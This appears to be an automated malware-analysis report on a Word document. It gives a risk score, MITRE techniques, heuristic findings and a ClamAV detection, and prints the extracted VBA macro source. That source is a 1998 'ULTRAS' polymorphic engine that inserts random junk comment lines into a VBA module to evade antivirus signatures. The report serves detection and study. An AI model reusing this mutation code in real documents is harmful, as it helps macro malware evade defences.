MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1553.004 Subvert Trust Controls: Mark-of-the-Web Bypass
The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the VBA macros are designed to self-replicate and tamper with AV signatures. The script 'macros.bas' confirms this by attempting to insert obfuscated lines into the VBA project, a common technique for polymorphic malware. The ClamAV detection on an extracted artifact further supports its malicious nature.
Heuristics 2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 814 bytes |
SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a |
|||
|
Detection
ClamAV:
Doc.Trojan.UMP-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Модуль1"
Sub UMPE()
'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998
MuNu = Int(Rnd() * 20 + 1)
For Mutate = 1 To MuNu
MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines
MuLi = Int(Rnd() * MuRL + 1)
MuLe = Int(Rnd() * 40 + 1)
For MuGe = 1 To MuLe
LiVe = Int((120 - 100 + 1) * Rnd + 228)
MuRe = MuRe + Chr$(LiVe)
Next MuGe
Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe
MuRe = ""
Next Mutate
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.